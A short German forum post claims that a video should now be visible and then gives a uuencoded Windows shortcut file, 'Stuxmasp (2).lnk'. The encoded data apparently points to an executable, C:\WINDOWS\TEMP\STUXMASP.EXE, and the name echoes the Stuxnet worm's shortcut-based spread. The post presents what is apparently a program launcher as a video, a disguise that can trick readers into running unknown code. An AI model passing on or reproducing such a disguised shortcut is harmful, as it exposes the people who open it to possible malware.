hoffendlich klappt es

wenn alles klappt müsste jetzt ein viedeo zu sehen sein !!!!

begin 600 Stuxmasp (2).lnk
M3 ````$4`@``````P ```````$8;````( ```* B8?K"++X!`-A6>&PLO@$`
M@@K[PBR^`0";`P```````0```````````````````'8`% `?`.!/T"#J.FD0
MHM@(`"LP,)T9`"-#.EP``````````````````````!'>%P`Q```````N)(AR
M$(!7:6YD;W=S```4`#$``````"XD-',0@%1E;7 ``!P`,@``FP,`E25H2B" 
M4W1U>&UA<W N97AE`````%4````<`````0```!P````W````$(!4950````;
M`````P```-L6:Q00````4U1(04-?1TU"2 !#.EQ724Y$3U=37%1%35!<4U15
M6$U!4U N15A%```=`"XN7"XN7"XN7"XN7%1%35!<4U156$U!4U N15A%#P!#
..EQ724Y$3U=37%1%35 N
`
end